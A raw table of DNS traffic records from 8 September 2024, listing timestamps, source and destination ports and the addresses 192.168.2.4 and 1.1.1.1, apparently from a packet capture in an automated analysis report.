                                                                                                                                                                                                            Sep 8, 2024 09:00:25.363235950 CEST6415853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.365099907 CEST53611341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.365232944 CEST53627261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.367412090 CEST53494571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.368623018 CEST5623553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.373043060 CEST53641581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.373385906 CEST53599221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.383936882 CEST53562351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.418615103 CEST53566311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.480634928 CEST53587471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.638133049 CEST5555053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.638983011 CEST5772553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.640142918 CEST5203053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.647625923 CEST53555501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.647839069 CEST53577251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.650011063 CEST53520301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.653291941 CEST5360253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.653480053 CEST6109853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.653714895 CEST5735453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.653870106 CEST4955753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.654531002 CEST6034353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.654937029 CEST5579453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655127048 CEST5243453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655294895 CEST6152753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655461073 CEST5697453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655610085 CEST5648353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655761003 CEST6399853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.656230927 CEST6339753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.656454086 CEST5815053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.656922102 CEST5225353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657182932 CEST5343253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657347918 CEST5568853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657502890 CEST5485853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.657893896 CEST5003953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.662435055 CEST53536021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.663702965 CEST53573541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.664123058 CEST53610981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.665117979 CEST53524341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.665354013 CEST53557941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.666105032 CEST53564831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.666306973 CEST53569741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.667345047 CEST53581501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.667663097 CEST53633971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.668118000 CEST53534321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.668790102 CEST53548581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.669114113 CEST53500391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.670555115 CEST53603431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.672595978 CEST53615271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.674441099 CEST53556881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.676830053 CEST6212253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.683150053 CEST6255653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.683373928 CEST5835253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.684688091 CEST6023053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.685194969 CEST53495571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.686446905 CEST5461553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.686708927 CEST5716653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.687016010 CEST5246753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.687244892 CEST4917453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.687258005 CEST5892853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.688667059 CEST53639981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.688906908 CEST53522531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.692229986 CEST53625561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.694408894 CEST53602301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.695696115 CEST6294253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.696307898 CEST53589281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.696683884 CEST53571661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.696845055 CEST53491741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.699054956 CEST53583521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.699167967 CEST5840853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.701641083 CEST53546151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.701766014 CEST6457653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.702306032 CEST53524671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.704875946 CEST53629421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.707349062 CEST53621221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.709076881 CEST53584081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.715503931 CEST5268453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.716022015 CEST5364653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.716999054 CEST5839353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.717298985 CEST5854553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.717827082 CEST5344553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.718030930 CEST6421353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.718224049 CEST6244753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.725353003 CEST53526841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.725753069 CEST53536461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.726052999 CEST53585451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.726419926 CEST53583931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.728228092 CEST53624471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.731885910 CEST53645761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.733122110 CEST53534451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735032082 CEST5647153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735340118 CEST6483453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735480070 CEST5312053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735691071 CEST5366853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735889912 CEST5579753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736342907 CEST5309253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736438990 CEST5243653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736637115 CEST5492153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736746073 CEST6265353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736947060 CEST6055853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736947060 CEST5948653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737179995 CEST5527153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737355947 CEST6135353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737540960 CEST5053853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741564989 CEST5190153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741636038 CEST5011353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741815090 CEST6365753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742003918 CEST5430053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742161036 CEST4968953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742178917 CEST6025453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742369890 CEST5000653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742635012 CEST6010653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742676973 CEST5016553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.743275881 CEST5016153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.744973898 CEST53531201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.744986057 CEST53564711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.745352983 CEST53594861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.745429039 CEST53648341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.745640993 CEST53557971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746011972 CEST53530921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746246099 CEST53524361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746256113 CEST53605581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746452093 CEST53505381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.747025967 CEST53613531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751064062 CEST53519011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751157999 CEST53536681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751651049 CEST53501651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751696110 CEST53602541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751784086 CEST53636571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.752136946 CEST53626531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.752175093 CEST53549211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.752661943 CEST53500061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.753031015 CEST53552711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.757555008 CEST53496891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.757936954 CEST53501131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.758163929 CEST53501611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.758394003 CEST53601061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.772624969 CEST53543001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.877535105 CEST53642131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.623008013 CEST6016653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.626430988 CEST4939753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.628856897 CEST5560953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.635159969 CEST5437153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.638818026 CEST53493971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.640563011 CEST53601661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.640708923 CEST5165653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.642151117 CEST53556091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.645523071 CEST53543711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.650935888 CEST53516561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.666471004 CEST6425953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.676008940 CEST53642591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.684571028 CEST6507653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.685777903 CEST5813653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.696305990 CEST53650761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.701040030 CEST53581361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.705532074 CEST6542553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.705928087 CEST5768453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.706367016 CEST5771253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.706991911 CEST5363953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.709281921 CEST5153953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.717787027 CEST53654251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.717880964 CEST53576841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.718170881 CEST53536391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.718184948 CEST53577121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.728646994 CEST53515391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.735200882 CEST5341453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.738208055 CEST5905153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.740416050 CEST6317953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.744962931 CEST5680553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.747242928 CEST5248953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.749761105 CEST6443953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750174999 CEST53590511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750525951 CEST5307253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.751035929 CEST53534141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.751461983 CEST6303353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.752343893 CEST53631791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.754790068 CEST53568051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.757179022 CEST53524891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.759820938 CEST53530721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.759926081 CEST5617653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760253906 CEST6540253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760451078 CEST6098053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760865927 CEST5751953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761293888 CEST6478953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761313915 CEST53630331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761553049 CEST5365953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.762670994 CEST6467253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.763757944 CEST5948553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.766047001 CEST53644391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.769284010 CEST53561761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.769902945 CEST53609801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.770828009 CEST53647891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.772839069 CEST53594851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.779481888 CEST53654021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.780051947 CEST53536591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.780216932 CEST53575191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.780926943 CEST53646721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.792445898 CEST5540353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.793724060 CEST5456653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.794042110 CEST5491753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.794265032 CEST5785453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.794878006 CEST5056553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.795221090 CEST5327353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.802845955 CEST53545661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.803812027 CEST53578541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.805919886 CEST53532731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.806379080 CEST5810653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.806521893 CEST5425053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807269096 CEST6453153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807488918 CEST5477653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807755947 CEST4957053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807914019 CEST5327253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.808073997 CEST5685853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.808291912 CEST6259153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.808798075 CEST5057153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809151888 CEST5439053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809370041 CEST5686153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809557915 CEST5770153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809729099 CEST53549171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809855938 CEST4987553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810096025 CEST5412653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810333967 CEST5073453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810497999 CEST5943953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810656071 CEST5054253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810806036 CEST5219653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810960054 CEST5729953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811110973 CEST5995153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811273098 CEST5099453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811422110 CEST5726653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811575890 CEST5161153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.812463999 CEST5793053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.813710928 CEST6355853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.814631939 CEST5554553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.816884995 CEST6478853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.820019960 CEST53532721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.820533037 CEST53568581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.821717024 CEST53505711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.821863890 CEST53543901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.821933985 CEST53577011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.823080063 CEST53572991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.823321104 CEST53505421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.823331118 CEST53599511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.824340105 CEST53555451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.824544907 CEST53572661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.824994087 CEST53579301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.825011969 CEST53505651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.825124979 CEST53581061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.825545073 CEST53645311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.826514006 CEST53647881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.826746941 CEST53547761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.828289032 CEST53625911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.828567028 CEST53568611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.828578949 CEST53507341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.828917027 CEST53521961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.829144001 CEST53541261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.830712080 CEST53635581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.830960989 CEST53516111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.831145048 CEST53509941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.840405941 CEST53542501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.841370106 CEST53495701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.842255116 CEST53498751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.843297958 CEST53594391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.968319893 CEST53554031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.934801102 CEST5772353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.944825888 CEST5858553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.945015907 CEST53577231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.951607943 CEST5559153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.954399109 CEST6507653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.958579063 CEST5686653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.966435909 CEST53585851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.967050076 CEST6399253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.967570066 CEST5605353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.969505072 CEST53555911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.972449064 CEST53568661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.977531910 CEST53560531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.992180109 CEST53650761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.011878014 CEST5097053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.011976004 CEST6111053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.012384892 CEST5863953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.012908936 CEST5827053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013171911 CEST5542253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013335943 CEST5349553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013714075 CEST5351553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013901949 CEST5037553192.168.2.41.1.1.1
